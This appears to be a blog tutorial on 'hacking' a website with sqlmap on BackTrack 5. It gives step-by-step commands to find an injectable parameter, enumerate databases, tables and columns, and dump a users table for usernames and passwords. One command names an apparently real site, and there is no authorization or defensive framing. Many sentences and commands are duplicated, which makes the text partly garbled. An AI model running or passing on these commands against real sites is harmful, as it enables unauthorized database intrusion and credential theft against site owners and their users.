What is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over of database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the database, to accessing
the underlying file system and executing commands on the operating system via out-of-band
connections.
exploiting SQL injection flaws and taking over of database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the database, to accessing
the underlying file system and executing commands on the operating system via out-of-band
connections.
Things you require
1) BackTrack 5
2) A vulnerable website
2) A vulnerable website
The vulnerable link i am going to use is
http://www.targetsite.com/item.php?id=200
http://www.targetsite.com/item.php?id=200
Step by step Procedure to hack :
First open Backtrack5 and then open SQLMAP. You can open SQLMAP by doing the
following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.
following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.
It opens your sqlmap console .
Scanning the URL and finding out the database names
Now i am going to scan the url using the following command.
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 –dbs
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 –dbs
Here –u is for URL .
You can also scan the entire website by simply replacing the above URL with the website‟s
URL.
URL.
Now i am going to scan the link.
It has shown me a very good message that “GET parameter “id” is vulnerable”.
And asked me to continue or stop. As i have already got a vulnerable parameter, i have stopped
by pressing „N‟. You can continue the scan if you want.
And asked me to continue or stop. As i have already got a vulnerable parameter, i have stopped
by pressing „N‟. You can continue the scan if you want.
Finding out table names
Great..!! We got the database names.
Now we need to find out the table and column names.
As information_schema is for metadata, i am going with the database “waterufo_net”.
The following query gives me the table names.
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net
Here –D is to specify the name of the database.
Finding out column names
Fine.. Now we got 6 tables. As we are always interested in usernames and passwords, lets
move on to the fl_users table and find the column names in that table.
move on to the fl_users table and find the column names in that table.
So we use the following query
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D
waterufo_net
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D
waterufo_net
Here -T is for tablename.
Retrieving Data
We got all the columns from the table fl_users. Now we have to retrieve the data from the
database. For that we need to write the following query. We are just adding –dump to the above
query.
database. For that we need to write the following query. We are just adding –dump to the above
query.
./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D
waterufo_net –dump
waterufo_net –dump
We got all the data we want. I hope you know what to do now.
0 comments:
Post a Comment